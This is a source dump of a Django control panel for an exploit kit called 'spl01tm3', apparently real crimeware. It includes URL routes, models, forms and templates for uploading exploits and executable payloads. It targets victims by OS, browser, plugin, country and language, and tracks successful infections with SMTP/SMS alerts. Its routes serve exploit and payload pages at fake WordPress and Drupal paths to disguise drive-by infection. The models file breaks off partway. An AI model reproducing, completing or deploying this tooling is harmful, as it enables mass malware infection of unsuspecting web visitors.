spl01tm3/controlpanel/urls.py
from django.conf.urls import patterns, url

from controlpanel import views

urlpatterns = patterns('',
    url(r'^set_timezone/$', views.set_timezone, name='set_timezone'),
    url(r'^threads/$', views.threads_list, name="threads"),
    url(r'^thread/(?:(?P<thread_id>\d+)/)?$', views.thread, name="thread"),
    url(r'^rule/(?:(?P<rule_id>\d+)/)?$', views.rule, name="rule"),
    url(r'^exploits/$', views.exploits_list, name="exploits"),
    url(r'^exploit/(?:(?P<exploit_id>\d+)/)?$', views.exploit, name="exploit"),
    url(r'^target/os/(?:(?P<target_os_id>\d+)/)?$', views.target_os, name="target_os"),
    url(r'^target/browser/(?:(?P<target_browser_id>\d+)/)?$', views.target_browser, name="target_browser"),
    url(r'^target/plugin/(?:(?P<target_plugin_id>\d+)/)?$', views.target_plugin, name="target_plugin"),
    url(r'^payloads/$', views.payloads_list, name="payloads"),
    url(r'^payload/(?:(?P<payload_id>\d+)/)?$', views.payload, name="payload"),
    url(r'^security/$', views.security, name="security"),
    url(r'^notifications/smtp_configuration/(?:(?P<conf_id>\d+)/)?$', views.smtp_configuration, name="smtpconf"),
    url(r'^notifications/sms_configuration/(?:(?P<conf_id>\d+)/)?$', views.sms_configuration, name="smsconf"),
    url(r'^notifications/recipient/(?:(?P<recipient_id>\d+)/)?$', views.notification_recipient, name="recipient"),
    url(r'^notifications/$', views.notifications, name="notifications"),
    url(r'^details/logs/$', views.explore_logs, name="explore_logs"),
    url(r'^details/$', views.details, name="details"),
    url(r'^icons/browser/(?P<family>[^/]+)(?:/(?P<version>[^/]+))?/$', views.browser_icon, name="browser_icon"),
    url(r'^icons/os/(?P<family>[^/]+)(?:/(?P<version>[^/]+))?/$', views.os_icon, name="os_icon"),
    # Stats tab (default)
    url(r'^$', views.stats, name='stats'),
)

spl01tm3/spl01tm3/urls.py
from django.conf.urls import patterns, include, url

from django.contrib import admin
admin.autodiscover()

urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'spl01tm3.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    url(r'^admin/', include(admin.site.urls)),
    url(r'^login/$', 'django.contrib.auth.views.login', name="login"),
    url(r'^logout/$', 'django.contrib.auth.views.logout_then_login', name="logout"),

    url(r'^panel/', include('controlpanel.urls', namespace="controlpanel", app_name="controlpanel")),
    url(r'^controller/', include('controller.urls', namespace="controller", app_name="controller")),

    url(r'^\d{4}/\d{2}/\d{2}/[a-zA-Z0-9\-_]*/.+$', 'landingpage.views.payload', name="payload_wordpress"),
    url(r'^(?:drupal/)?node/\d+/.+$', 'landingpage.views.payload', name="payload_drupal"),

    url(r'^\d{4}/\d{2}/\d{2}/[a-zA-Z0-9\-_]*/$', 'landingpage.views.exploit', name="exploit_wordpress"),
    url(r'^(?:drupal/)?node/\d+/$', 'landingpage.views.exploit', name="exploit_drupal"),
    #url(r'^modules.php$', 'landingpage.views.exploit', name="exploit_phpnuke"),

    url(r'^(\d+)$', 'landingpage.views.landingpage', name="landingpage"),
)

spl01tm3/controlpanel/models.py
import pytz
from datetime import datetime
from django.db import models
from controlpanel.constants import *
from spl01tm3.utils import *
from django.conf import settings

def add_now():
    return datetime.now(getattr(pytz, settings.TIME_ZONE))

class Payload(models.Model):
    """Payload served by the EK.
    Usually an executable file that gets launched by an exploit
    """
    name                = models.CharField("Payload name", max_length=150, null=False, blank=False, unique=True)
    file                = models.FileField("Payload file", upload_to="uploads/payloads", null=False, blank=False)

    def __unicode__(self):
        return u"{}".format(self.name)

class Exploit(models.Model):
    """Exploit or Infecting Item
    May range from a simple URL to redirect the user to, up to a file containing the exploit itself.
    """
    name                = models.CharField("Exploit name", max_length=150, null=False, blank=False, unique=True)
    file                = models.FileField("Exploit file", upload_to="uploads/exploits", null=False, blank=False)
    type                = models.IntegerField("Exploit type", null=False, blank=False, default=EXPLOIT_FILE, choices=ENUM_EXPLOIT_TYPES)

    def __unicode__(self):
        return u"{}".format(self.name)

class OperatingSystem(models.Model):
    """Operating system
    This is useful for stats, but also to limit the action of a given Rule to a set of operating systems.
    This table should be populated with a Fixture during setup and never modified, as it lists
    all Operating Systems detected by the landing page.
    - Family is "Windows", "Linux", "BSD", etc.
    - Name is "Windows XP", "Ubuntu", "FreeBSD", etc.
    - Version_X is "6.1.0", "14.04.2", "10.0.0", etc.
    """
    name                = models.CharField("OS name", max_length=150, null=False, blank=False, unique=True)
    code                = models.CharField("OS code", max_length=150, null=False, blank=False, unique=True)

    def __unicode__(self):
        return u"{}".format(self.name)

class TargetOperatingSystem(models.Model):
    exploit = models.ForeignKey(Exploit, null=False, blank=False)
    operating_system = models.ForeignKey(OperatingSystem, null=False, blank=False)
    version_min = models.CharField("Min version", max_length=64, null=True, blank=True, default=None)
    version_max = models.CharField("Max version", max_length=64, null=True, blank=True, default=None)

class Browser(models.Model):
    """Browser
    This is useful for stats, but also to limit the action of a given Rule to a set of browsers.
    This table should be populated with a Fixture during setup and never modified, as it lists
    all Operating Systems detected by the landing page.
    - Family is "Firefox", "IE", "Chrome", etc.
    - Version_X is "33.0", "11.0", "38.0.12342", etc.
    """
    name                = models.CharField("Browser name", max_length=150, null=False, blank=False, unique=True)
    code                = models.CharField("Browser code", max_length=150, null=False, blank=False, unique=True)

    def __unicode__(self):
        return u"{}".format(self.name)

class TargetBrowser(models.Model):
    exploit = models.ForeignKey(Exploit, null=False, blank=False)
    browser = models.ForeignKey(Browser, null=False, blank=False)
    version_min = models.CharField("Min version", max_length=64, null=True, blank=True, default=None)
    version_max = models.CharField("Max version", max_length=64, null=True, blank=True, default=None)

class Plugin(models.Model):
    """Plugin to be attacked
    This object is useful when creating a new Rule (Thread), to limit possible choices.
    This table should be populated with a Fixture during setup and never modified, as it lists
    all plugins detected by the landing page.
    """
    name                = models.CharField("Plugin name", max_length=150, null=False, blank=False, unique=True)
    code                = models.CharField("Plugin code", max_length=150, null=False, blank=False, unique=True)

    def __unicode__(self):
        return u"{}".format(self.name)

class TargetPlugin(models.Model):
    exploit = models.ForeignKey(Exploit, null=False, blank=False)
    plugin = models.ForeignKey(Plugin, null=False, blank=False)
    version_min = models.CharField("Min version", max_length=64, null=True, blank=True, default=None)
    version_max = models.CharField("Max version", max_length=64, null=True, blank=True, default=None)

class Country(models.Model):
    """Country description
    This is useful for stats, but also to limit the action of a given Rule to a set of countries.
    This table should be populated with a Fixture during setup and never modified, as it lists
    all countries detected by the landing page.
    """
    name                = models.CharField("Name", max_length=150, null=False, blank=False, unique=True)
    code_2              = models.CharField("Code 2", max_length=2, null=False, blank=False, unique=True)
    code_3              = models.CharField("Code 3", max_length=3, null=True, blank=True, default=None)
    iso_number          = models.CharField("ISO number", max_length=3, null=True, blank=True, default=None)

    class Meta:
        verbose_name_plural = 'countries'

    def __unicode__(self):
        return u"{}".format(self.name)

class Language(models.Model):
    """Language description
    This is useful for stats, but also to limit the action of a given Rule to a set of system languages.
    This table should be populated with a Fixture during setup and never modified, as it lists
    all languages detected by the landing page.
    """
    name                = models.CharField("Name", max_length=150, null=False, blank=False)
    subtag              = models.CharField("Subtag", max_length=10, null=False, blank=False)

    class Meta:
        unique_together = (('name', 'subtag'),)

    def __unicode__(self):
        return u"{} ({})".format(self.name, self.subtag)

class NotificationMessageType(models.Model):
    """Notification message types
    Types of notification messages that the system can generate. Some examples are:
    - Security issues
    - Security warnings
    - Successful download of payload
    - ...
    """
    message_type        = models.CharField("Type of message", max_length=250, null=False, blank=False)

    def __unicode__(self):
        return u"{}".format(self.message_type)

class NotificationSMTPConfiguration(models.Model):
    name                = models.CharField(
        "Name",
        max_length=254,
        null=False,
        blank=False,
        help_text="Provides a descriptive name for this SMTP configuration."
        )
    server              = models.CharField(
        "Server",
        max_length=254,
        null=False,
        blank=True,
        default="localhost",
        help_text="The SMTP server's IP address or name (defaults to \"localhost\"). Do not include the port, there's a dedicate field below."
        )
    port                = models.CharField(
        "Server port",
        max_length=254,
        null=False,
        blank=True,
        default="25",
        help_text="The SMTP server's port. Defaults to 25."
        )
    encryption          = models.IntegerField(
        "Encryption mode",
        null=False,
        blank=True,
        default=SMTP_ENCRYPT_NONE,
        choices=ENUM_SMTP_ENCRYPT_MODES,
        help_text="Specifies the encryption mode to be used for this server. Defaults to no encryption."
        )
    auth_required       = models.BooleanField(
        "Authentication required",
        null=False,
        blank=True,
        default=False,
        help_text="Check this if the server requires authentication. If so, please provide the correct username and password below."
        )
    username            = models.CharField(
        "Username",
        max_length=254,
        null=True,
        blank=True,
        default=None,
        help_text="Username to be used for authenticating to the SMTP server. This is required if you checked the \"Authentication required\" checkbox above."
        )
    password            = models.CharField(
        "Password",
        max_length=254,
        null=True,
        blank=True,
        default=None,
        help_text="Password to be used for authenticating to the SMTP server. This is required if you checked the \"Authentication required\" checkbox above."
        )
    sender              = models.CharField(
        "Sender address",
        max_length=254,
        null=True,
        blank=True,
        default=None,
        help_text="Specifies the sender for the notification emails. E.g. \"Jonn Doe <j.doe@test.com>\" or just \"j.doe@test.com\""
        )

    def __unicode__(self):
        return u"{}".format(self.name)

class NotificationSMSConfiguration(models.Model):
    name                = models.CharField(
        "Name for this configuration",
        max_length=254,
        null=False,
        blank=False,
        help_text="Provides a descriptive name for this SMS configuration"
        )
    service             = models.IntegerField(
        "Service",
        null=False,
        blank=False,
        default=SMS_TWILIO,
        choices=ENUM_SMS_SERVICES,
        help_text="Select one of the supported SMS services. Some of them will require registration."
        )
    account             = models.CharField(
        "Account id",
        max_length=514,
        null=True,
        blank=True,
        default=None,
        help_text="Account ID to be used to authenticate to the service."
        )
    authentication      = models.CharField(
        "Auth token",
        max_length=514,
        null=True,
        blank=True,
        default=None,
        help_text="Auth token (or password) required to authenticate to the service."
        )
    from_number         = models.CharField(
        "Sender phone number",
        max_length=254,
        null=True,
        blank=True,

spl01tm3/controlpanel/forms.py
from datetime import datetime
from dateutil.relativedelta import relativedelta
from django import forms
from controlpanel.models import *

class ThreadForm(forms.ModelForm):
    def __init__(self, *args, **kwargs):
        super(ThreadForm, self).__init__(*args, **kwargs)
        #self.fields['countries'].choices = sorted(self.fields['countries'].choices, key=lambda x: x[1])
        #self.fields['languages'].choices = sorted(self.fields['languages'].choices, key=lambda x: x[1])
        self.fields['countries'].choices = [(x.id, x) for x in Country.objects.order_by('name')]
        self.fields['languages'].choices = [(x.id, x) for x in Language.objects.order_by('name')]

    class Meta:
        model   = Thread
        fields  = '__all__'

class RuleForm(forms.ModelForm):
    class Meta:
        model   = Rule
        fields  = '__all__'

class ExploitForm(forms.ModelForm):
    class Meta:
        model   = Exploit
        fields  = '__all__'

class TargetOperatingSystemForm(forms.ModelForm):
    class Meta:
        model   = TargetOperatingSystem
        fields  = '__all__'

class TargetBrowserForm(forms.ModelForm):
    class Meta:
        model   = TargetBrowser
        fields  = '__all__'

class TargetPluginForm(forms.ModelForm):
    class Meta:
        model   = TargetPlugin
        fields  = '__all__'

class PayloadForm(forms.ModelForm):
    class Meta:
        model   = Payload
        fields  = '__all__'

class GeneralSettingForm(forms.ModelForm):
    class Meta:
        model   = GeneralSetting
        fields  = '__all__'

class NotificationSMTPConfigurationForm(forms.ModelForm):
    class Meta:
        model   = NotificationSMTPConfiguration
        fields  = '__all__'

class NotificationSMSConfigurationForm(forms.ModelForm):
    class Meta:
        model   = NotificationSMSConfiguration
        fields  = '__all__'

class NotificationRecipientForm(forms.ModelForm):
    class Meta:
        model   = NotificationRecipient
        fields  = '__all__'

class StatsForm(forms.Form):
    date_min    = forms.DateTimeField(required=False, label="From...")
    date_max    = forms.DateTimeField(required=False, label="To...")
    thread      = forms.ModelChoiceField(required=False, queryset=Thread.objects.all(), empty_label="All threads")
    auto_refresh = forms.BooleanField(required=False, label="Auto refresh page", initial=True)

class DetailsForm(forms.Form):
    STATUS_ALL              = ''
    STATUS_FAILED           = 'failed'
    STATUS_EXPLOIT_SUCCESS  = 'exploit'
    STATUS_PAYLOAD_SUCCESS  = 'payload'
    STATUS_CHOICES = (
        (STATUS_ALL,                'All'),
        (STATUS_FAILED,             'Failed'),
        (STATUS_EXPLOIT_SUCCESS,    'Successful Exploit'),
        (STATUS_PAYLOAD_SUCCESS,    'Successful Payload'),
    )

    date_min    = forms.DateTimeField(required=False, label="From")
    date_max    = forms.DateTimeField(required=False, label="To")
    thread      = forms.ModelChoiceField(required=False, label="Thread", queryset=Thread.objects.order_by('name'), empty_label="All threads")
    auto_refresh = forms.BooleanField(required=False, label="Auto refresh page", initial=True)
    country     = forms.ModelChoiceField(required=False, label="Country", queryset=Country.objects.order_by('name'), empty_label="All countries", to_field_name="code_2")
    browser     = forms.CharField(required=False, label="Browser")
    os          = forms.CharField(required=False, label="OS")
    status      = forms.ChoiceField(required=False, label="Status", choices=STATUS_CHOICES)

class ExploreLogsForm(forms.Form):
    date_min    = forms.DateTimeField(required=False, label="From")
    date_max    = forms.DateTimeField(required=False, label="To")
    session_id  = forms.CharField(required=False, label="Session key")
    source_ip   = forms.GenericIPAddressField(required=False, label="Source IP")

spl01tm3/templates/controlpanel/payloads.html
{% extends "base.html" %}
{% block title %}Payloads{% endblock %}
{% block navbar %}{% include 'navbar.html' %}{% endblock %} 
{% block content %}
    <div class="row">
        <div class="col-md-10">
            <div class="panel panel-primary" id="payloads_list">
                <div class="panel-heading">
                    <h3 class="panel-title">Payloads</h3>
                </div>
                <div class="panel-body">
                    <table class="table table-striped table-bordered table-hover" id="table_payloads">
                        <thead>
                            <tr>
                                <th>ID</th>
                                <th>Name</th>
                            </tr>
                        </thead>
                        <tbody>
                            {% for payload in payloads %}
                            <tr onclick="window.document.location='{% url 'controlpanel:payload' payload.id %}';" style="cursor:pointer;">
                                <td>
                                    {{ payload.id }}
                                </td>
                                <td>
                                    {{ payload.name }}
                                </td>
                            </tr>
                            {% endfor %}
                        </tbody>
                    </table>
                    <a class="btn btn-success" href="{% url 'controlpanel:payload' %}"><span class="glyphicon glyphicon-plus-sign"></span> Add new Payload</a>
                </div>
            </div>
        </div>
    </div>
{% endblock %}
{% block bottomscripts %}
$('#table_payloads').dataTable({
    "bProcessing": false,
    "bStateSave": true,
    "bJQueryUI": true,
    "bAutoWidth": false,
    "bSort": false,
    "sPaginationType": "full_numbers",
    "oLanguage":{
        "sZeroRecords": "No records found.",
        "sLengthMenu": "Display: _MENU_",
        "sInfoFiltered": "",
        "sEmptyTable": "Still no payloads here"
    }
});
{% endblock %}

spl01tm3/templates/controlpanel/recipient.html
{% extends "base.html" %}
{% block title %}Notifications - Recipient{% endblock %}
{% block navbar %}{% include 'navbar.html' %}{% endblock %}
{% block breadcrumb %}
    <ol class="breadcrumb">
        <li><a href="{% url 'controlpanel:notifications' %}">Notifications</a></li>
        <li class="active">{{ form.name.value|default:"New Notification Recipient" }}</li>
    </ol>
{% endblock %}
{% block content %}
    <form id="recipient" name="recipient" method="post" role="form">
        {% csrf_token %}
        <div class="row">
            <div class="col-md-10">
                {% if form.errors %}
                <div class="alert alert-danger" role="alert">Please review the errors below and try again</div>
                {% endif %}
                {% for error in form.non_field_errors %}
                <div class="alert alert-danger" role="alert">{{ error|escape }}</div>
                {% endfor %}
                <div class="panel panel-primary" id="panel_recipient_info">
                    <div class="panel-heading">
                        <h3 class="panel-title">Recipient Info</h3>
                    </div>
                    <div class="panel-body">
                        {% for error in form.name.errors %}
                        <div class="alert alert-danger" role="alert">{{ error|escape }}</div>
                        {% endfor %}
                        <div class="form-group">
                            {{ form.name.label_tag }} {% if form.name.help_text %}<div class="pull-right"><span class="glyphicon glyphicon-info-sign" style="cursor: pointer;" data-toggle="popover" title="{{ form.name.label }}" data-content="{{ form.name.help_text }}"></span></div>{% endif %}
                            <input type="text" class="form-control" id="{{ form.name.id_for_label }}" name="{{ form.name.html_name }}" value="{{ form.name.value|default:"" }}">
                        </div>
                    </div>
                </div>
                <div class="panel panel-primary" id="panel_email">
                    <div class="panel-heading">
                        <h3 class="panel-title">Email Configuration</h3>
                    </div>
                    <div class="panel-body">
                        {% for error in form.email_address.errors %}
                        <div class="alert alert-danger" role="alert">{{ error|escape }}</div>
                        {% endfor %}
                        <div class="form-group">
                            {{ form.email_address.label_tag }} {% if form.email_address.help_text %}<div class="pull-right"><span class="glyphicon glyphicon-info-sign" style="cursor: pointer;" data-toggle="popover" title="{{ form.email_address.label }}" data-content="{{ form.email_address.help_text }}"></span></div>{% endif %}
                            <input type="text" class="form-control" id="{{ form.email_address.id_for_label }}" name="{{ form.email_address.html_name }}" value="{{ form.email_address.value|default:"" }}">
                        </div>
                        {% for error in form.email_message_types.errors %}
                        <div class="alert alert-danger" role="alert">{{ error|escape }}</div>
                        {% endfor %}
                        <div class="form-group">
                            {{ form.email_message_types.label_tag }} {% if form.email_message_types.help_text %}<div class="pull-right"><span class="glyphicon glyphicon-info-sign" style="cursor: pointer;" data-toggle="popover" title="{{ form.email_message_types.label }}" data-content="{{ form.email_message_types.help_text }}"></span></div>{% endif %}
                            <select class="form-control" name="{{ form.email_message_types.html_name }}" id="{{ form.email_message_types.id_for_label }}" multiple="multiple">
                                {% for choice in form.email_message_types.field.choices %}
                                <option value="{{ choice.0 }}"{% if choice.0 in form.email_message_types.value %} selected="selected"{% endif %}>{{choice.1}}</option>
                                {% endfor %}
                            </select>
                        </div>
                        {% for error in form.email_server_conf.errors %}
                        <div class="alert alert-danger" role="alert">{{ error|escape }}</div>
                        {% endfor %}
                        <div class="form-group">
                            {{ form.email_server_conf.label_tag }} {% if form.email_server_conf.help_text %}<div class="pull-right"><span class="glyphicon glyphicon-info-sign" style="cursor: pointer;" data-toggle="popover" title="{{ form.email_server_conf.label }}" data-content="{{ form.email_server_conf.help_text }}"></span></div>{% endif %}
                            <select class="form-control" name="{{ form.email_server_conf.html_name }}" id="{{ form.email_server_conf.id_for_label }}">
                                {% for choice in form.email_server_conf.field.choices %}
                                <option value="{{ choice.0 }}"{% ifequal form.email_server_conf.value choice.0 %} selected="selected"{% endifequal %}>{{ choice.1 }}</option>
                                {% endfor %}
                            </select>
                        </div>
                        {% if form.instance.id %}
                        <a class="btn btn-success" href="{% url 'controlpanel:smtpconf' %}"><span class="glyphicon glyphicon-plus-sign"></span> Add new SMTP Server Configuration</a>
                        {%  endif %}
                    </div>
                </div>
                <div class="panel panel-primary" id="panel_sms">
                    <div class="panel-heading">
                        <h3 class="panel-title">SMS Configuration</h3>
                    </div>
                    <div class="panel-body">
                        {% for error in form.sms_number.errors %}
                        <div class="alert alert-danger" role="alert">{{ error|escape }}</div>
                        {% endfor %}
                        <div class="form-group">
                            {{ form.sms_number.label_tag }} {% if form.sms_number.help_text %}<div class="pull-right"><span class="glyphicon glyphicon-info-sign" style="cursor: pointer;" data-toggle="popover" title="{{ form.sms_number.label }}" data-content="{{ form.sms_number.help_text }}"></span></div>{% endif %}
                            <input type="text" class="form-control" id="{{ form.sms_number.id_for_label }}" name="{{ form.sms_number.html_name }}" value="{{ form.sms_number.value|default:"" }}">
                        </div>
                        {% for error in form.sms_message_types.errors %}
                        <div class="alert alert-danger" role="alert">{{ error|escape }}</div>
                        {% endfor %}
                        <div class="form-group">
                            {{ form.sms_message_types.label_tag }} {% if form.sms_message_types.help_text %}<div class="pull-right"><span class="glyphicon glyphicon-info-sign" style="cursor: pointer;" data-toggle="popover" title="{{ form.sms_message_types.label }}" data-content="{{ form.sms_message_types.help_text }}"></span></div>{% endif %}
                            <select class="form-control" name="{{ form.sms_message_types.html_name }}" id="{{ form.sms_message_types.id_for_label }}" multiple="multiple">
                                {% for choice in form.sms_message_types.field.choices %}
                                <option value="{{ choice.0 }}"{% if choice.0 in form.sms_message_types.value %} selected="selected"{% endif %}>{{choice.1}}</option>
                                {% endfor %}
                            </select>
                        </div>
                        {% for error in form.sms_server_conf.errors %}
                        <div class="alert alert-danger" role="alert">{{ error|escape }}</div>
                        {% endfor %}
                        <div class="form-group">
                            {{ form.sms_server_conf.label_tag }} {% if form.sms_server_conf.help_text %}<div class="pull-right"><span class="glyphicon glyphicon-info-sign" style="cursor: pointer;" data-toggle="popover" title="{{ form.sms_server_conf.label }}" data-content="{{ form.sms_server_conf.help_text }}"></span></div>{% endif %}
                            <select class="form-control" name="{{ form.sms_server_conf.html_name }}" id="{{ form.sms_server_conf.id_for_label }}">
                                {% for choice in form.sms_server_conf.field.choices %}
                                <option value="{{ choice.0 }}"{% ifequal form.sms_server_conf.value choice.0 %} selected="selected"{% endifequal %}>{{ choice.1 }}</option>
                                {% endfor %}
                            </select>
                        </div>
                        {% if form.instance.id %}
                        <a class="btn btn-success" href="{% url 'controlpanel:smsconf' %}"><span class="glyphicon glyphicon-plus-sign"></span> Add new SMS Service Configuration</a>
                        {%  endif %}
                    </div>
                </div>
            </div>
            <div class="col-md-2">
                <nav class="bs-docs-sidebar">
                    <ul id="sidebar" class="nav nav-stacked fixed">
                        <li><input type="submit" id="recipient_save" class="btn btn-default" value="Save" style="margin-bottom:20px;margin-left:20px;" disabled="disabled" onclick="needConfirmation = false;"></li>
                        <li><a href="#panel_recipient_info">Recipient Info</a></li>
                        <li><a href="#panel_email">Email Configuration</a></li>
                        <li><a href="#panel_sms">SMS Configuration</a></li>
                    </ul>
                </nav>
            </div>
        </div>
    </form>
{% endblock %}
{% block bottomscripts %}
var needConfirmation = false;

$('body').scrollspy({
    target: '.bs-docs-sidebar',
    offset: 40
});

$('form#recipient').change(function(){
    $('input#recipient_save').prop('disabled', false).removeClass('btn-default').addClass('btn-danger');
    needConfirmation = true;
});

$(function () {
  $('[data-toggle="popover"]').popover({placement: "auto top", html: true})
})

window.onbeforeunload = confirmExit;
function confirmExit(){
    if (needConfirmation)
        return "You have unsaved changes, are you sure you want to exit?";
}

$('#{{ form.asncheck_type.id_for_label }}').selectpicker();
$('#{{ form.hostnamecheck_type.id_for_label }}').selectpicker();
{% endblock %}
{% block customcss %}
.fixed {
    position: fixed;
}

/* sidebar */
.bs-docs-sidebar {
    padding-left: 20px;
    margin-top: 0px;
    margin-bottom: 20px;
}

/* all links */
.bs-docs-sidebar .nav>li>a {
    color: #999;
    border-left: 2px solid transparent;
    padding: 4px 20px;
    font-size: 13px;
    font-weight: 400;
}

/* nested links */
.bs-docs-sidebar .nav .nav>li>a {
    padding-top: 1px;
    padding-bottom: 1px;
    padding-left: 30px;
    font-size: 12px;
}

/* active & hover links */
.bs-docs-sidebar .nav>.active>a, 
.bs-docs-sidebar .nav>li>a:hover, 
.bs-docs-sidebar .nav>li>a:focus {
    color: #563d7c;                 
    text-decoration: none;          
    background-color: transparent;  
    border-left-color: #563d7c; 
}
/* all active links */
.bs-docs-sidebar .nav>.active>a, 
.bs-docs-sidebar .nav>.active:hover>a,
.bs-docs-sidebar .nav>.active:focus>a {
    font-weight: 700;
}
/* nested active links */
.bs-docs-sidebar .nav .nav>.active>a, 
.bs-docs-sidebar .nav .nav>.active:hover>a,
.bs-docs-sidebar .nav .nav>.active:focus>a {
    font-weight: 500;
}

/* hide inactive nested list */
.bs-docs-sidebar .nav ul.nav {
    display: none;           
}
/* show active nested list */
.bs-docs-sidebar .nav>.active>ul.nav {
    display: block;           
}
{% endblock %}